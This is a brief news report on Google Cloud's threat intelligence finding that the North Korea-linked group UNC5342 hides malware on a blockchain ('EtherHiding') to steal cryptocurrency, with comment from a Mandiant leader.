Google Cloud Threat Intelligence Group (GTIG) said on the 17th that it had identified signs that the North Korea-linked hacker group UNC5342 used a new attack technique called "EtherHiding" to steal cryptocurrency and collect sensitive information. EtherHiding is a technique that hides malware commands by leveraging a decentralized blockchain.
According to GTIG, UNC5342's recent attacks compromised victims' systems by affecting multiple operating systems (OS), including Windows, macOS, and Linux, through a multi-stage malware infection process. UNC5342 stored the malware used in the attacks on an immutable blockchain, retrieved it as "read-only" to anonymously maintain continuous command and control, and flexibly changed the payload (payload·remote control program) as needed.
GTIG assessed, "It is concerning in that it suggests UNC5342 has secured a way to neutralize any attempt to block or disrupt their operations through the EtherHiding technique and to sustain their attacks."
Robert Wallace, consulting leader at Google Cloud Mandiant, said, "The development of such attack techniques shows that the threat landscape is intensifying," and added, "State-backed threat groups are using new technologies to distribute malware that can be easily modified for new operations in response to law enforcement actions."